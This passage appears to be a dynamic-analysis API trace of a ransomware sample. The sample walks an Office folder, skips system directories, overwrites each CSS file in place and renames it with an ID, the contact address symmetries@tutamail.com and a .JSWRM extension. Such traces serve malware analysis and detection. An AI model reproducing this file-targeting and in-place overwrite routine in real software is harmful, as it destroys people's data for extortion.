lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0118.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0118.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0118.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0118.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0118.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME52.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme52.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME52.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme52.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0118.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0118.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0118.398] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e6a4, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME53.CSS", cAlternateFileName="")) returned 1 [0118.398] lstrcmpiW (lpString1="SCHEME53.CSS", lpString2=".") returned 1 [0118.398] lstrcmpiW (lpString1="SCHEME53.CSS", lpString2="..") returned 1 [0118.398] lstrcmpiW (lpString1="SCHEME53.CSS", lpString2="...") returned 1 [0118.398] lstrcmpiW (lpString1="SCHEME53.CSS", lpString2="windows") returned -1 [0118.398] lstrcmpiW (lpString1="SCHEME53.CSS", lpString2="recovery") returned 1 [0118.398] lstrcmpiW (lpString1="SCHEME53.CSS", lpString2="perflogs") returned 1 [0118.398] lstrcmpiW (lpString1="SCHEME53.CSS", lpString2="documents and settings") returned 1 [0118.398] lstrcmpiW (lpString1="SCHEME53.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.398] lstrcmpiW (lpString1="SCHEME53.CSS", lpString2="system volume information") returned -1 [0118.398] lstrcmpiW (lpString1="SCHEME53.CSS", lpString2="msocache") returned 1 [0118.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0118.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME53.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME53.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME53.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0118.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0118.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME53.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME53.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME53.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0118.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0118.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0118.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME53.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme53.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.400] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=124580) returned 1 [0118.400] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e6a0) returned 0x24c1d0 [0118.400] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e6a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e6a0, lpOverlapped=0x0) returned 1 [0118.409] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.409] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e6a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e6a0, lpOverlapped=0x0) returned 1 [0118.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.410] CloseHandle (hObject=0x314) returned 1 [0118.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0118.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0118.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0118.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0118.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0118.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0118.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0118.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0118.410] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME53.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme53.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME53.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme53.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0118.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0118.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.411] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f064, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME54.CSS", cAlternateFileName="")) returned 1 [0118.411] lstrcmpiW (lpString1="SCHEME54.CSS", lpString2=".") returned 1 [0118.411] lstrcmpiW (lpString1="SCHEME54.CSS", lpString2="..") returned 1 [0118.411] lstrcmpiW (lpString1="SCHEME54.CSS", lpString2="...") returned 1 [0118.411] lstrcmpiW (lpString1="SCHEME54.CSS", lpString2="windows") returned -1 [0118.411] lstrcmpiW (lpString1="SCHEME54.CSS", lpString2="recovery") returned 1 [0118.411] lstrcmpiW (lpString1="SCHEME54.CSS", lpString2="perflogs") returned 1 [0118.411] lstrcmpiW (lpString1="SCHEME54.CSS", lpString2="documents and settings") returned 1 [0118.411] lstrcmpiW (lpString1="SCHEME54.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.411] lstrcmpiW (lpString1="SCHEME54.CSS", lpString2="system volume information") returned -1 [0118.411] lstrcmpiW (lpString1="SCHEME54.CSS", lpString2="msocache") returned 1 [0118.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0118.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME54.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME54.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME54.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0118.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0118.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME54.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME54.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME54.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0118.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0118.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0118.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0118.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME54.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme54.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.412] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=127076) returned 1 [0118.412] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f060) returned 0x24c1d0 [0118.413] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f060, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f060, lpOverlapped=0x0) returned 1 [0118.470] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.470] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f060, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f060, lpOverlapped=0x0) returned 1 [0118.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.471] CloseHandle (hObject=0x314) returned 1 [0118.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0118.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0118.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0118.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0118.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0118.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0118.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0118.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0118.471] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME54.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme54.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME54.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme54.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0118.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0118.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0118.485] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e114, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME55.CSS", cAlternateFileName="")) returned 1 [0118.485] lstrcmpiW (lpString1="SCHEME55.CSS", lpString2=".") returned 1 [0118.485] lstrcmpiW (lpString1="SCHEME55.CSS", lpString2="..") returned 1 [0118.485] lstrcmpiW (lpString1="SCHEME55.CSS", lpString2="...") returned 1 [0118.485] lstrcmpiW (lpString1="SCHEME55.CSS", lpString2="windows") returned -1 [0118.485] lstrcmpiW (lpString1="SCHEME55.CSS", lpString2="recovery") returned 1 [0118.485] lstrcmpiW (lpString1="SCHEME55.CSS", lpString2="perflogs") returned 1 [0118.485] lstrcmpiW (lpString1="SCHEME55.CSS", lpString2="documents and settings") returned 1 [0118.485] lstrcmpiW (lpString1="SCHEME55.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.485] lstrcmpiW (lpString1="SCHEME55.CSS", lpString2="system volume information") returned -1 [0118.485] lstrcmpiW (lpString1="SCHEME55.CSS", lpString2="msocache") returned 1 [0118.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0118.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME55.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME55.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME55.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0118.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0118.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME55.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME55.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME55.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0118.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0118.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0118.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0118.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME55.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme55.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.487] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=123156) returned 1 [0118.488] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e110) returned 0x24c1d0 [0118.488] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e110, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e110, lpOverlapped=0x0) returned 1 [0118.580] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.580] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e110, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e110, lpOverlapped=0x0) returned 1 [0118.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.581] CloseHandle (hObject=0x314) returned 1 [0118.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0118.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0118.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0118.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0118.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0118.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0118.581] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME55.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme55.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME55.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme55.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0118.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0118.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0118.583] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, 